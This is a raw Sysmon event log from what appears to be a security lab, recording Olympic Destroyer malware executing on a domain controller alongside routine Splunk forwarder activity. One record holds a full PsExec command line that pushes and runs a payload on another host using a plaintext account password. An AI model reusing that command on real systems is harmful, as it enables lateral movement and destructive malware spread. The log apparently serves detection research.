11:00:56.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.147{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.149{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.147{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:57.552{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F77BB97082739A8383F4B234A37DD5C6,SHA256=B02AACC405A7084C29F8F7F4E8B0176739A578A142F3CE329F4CA06F96DD8FBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:57.106{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47095DDDB9642DA5706B73167C986877,SHA256=4B4CF88E7EBC22ED3B352101D8821036D275BF3DFBC24449D5369E612BC6B033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:57.153{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B02C7BF1B0259659D19E53D6B5093C65,SHA256=B1DB4178185D94C8775481E56F276A43C60CAC5C6A34EE453986E7FD5F054C0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:58.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6CF5C1279C130023709A4F7A121DB67,SHA256=A77268EF5B5FB2FA746565C3030C7602DF3DF2C1CDE27F182110EACC5045986E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:58.153{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCB26760C95DB97289D3A010B060365,SHA256=1EC4ED6BBF3972D9B00BFAA0ACC0F0B7A951E5FC5E857EC21C0D88CB3AF5FDFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.185{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57957- 354300x8000000000000000218464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:54.664{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51460-false10.0.1.12-8000- 23542300x8000000000000000294094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:59.588{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80027767DBD262C7A9FE62A29B8AD277,SHA256=199330A957D7C0FE2C79B18BEF3C045CCF58D5A328E326A211096263CF771E86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:59.168{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5217EDC0A72516E601C0032CB9B76E22,SHA256=D9C5FCE8A87CBF1531232A307196D675F66B32159EA6ECE52AA1B0BBDD98BF43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:00.593{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD8CA018521B96B2FC7CA8AC654D2CCC,SHA256=DCCE7F2BD48EA1E3FC4981AB9C1C442760B66C4DAA533E0D450D855B788DDD24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:00.184{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F145E2AC7F4537E9DDB59C22384D7CE8,SHA256=61AC9D0F90F946B71B2BDF852055702C9FA2DC725D40D2057C5055B9137C8411,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:57.494{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53862-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000294095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:57.327{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52524- 23542300x8000000000000000294106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.649{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAF08FFAF55EA3A339DE7AA8713A1FAD,SHA256=25F9E4C20383748BEEAE0CCB71320663BD3808C0BCE73D5C7CBC03F7BA2482B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:01.199{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAB58397DB76B5ED87E168754BCAA5FA,SHA256=E1B46EF8B9C746DF31A223590661303BBE3679AA27352D57A8A0BDE35C4324EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.465{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13ED-6216-8206-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.465{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-13ED-6216-8206-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.465{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13ED-6216-8206-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:01.466{C8EA50B7-13ED-6216-8206-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B7EFE0C54A324A61EB00711B4F33176,SHA256=CBB335CB88C89EC46439E8A3A977A5090F5331495AD558989BC5501B05971F7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:02.215{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E861227DCF8AAE9583A138031A303A37,SHA256=34774855DF0E6BDF3B6873EAFD668CF235D9B7DC821C0E75E9778470B6DCB33A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.393{C8EA50B7-13EE-6216-8306-000000003802}44326272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.077{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13EE-6216-8306-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.077{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.077{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:02.077{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 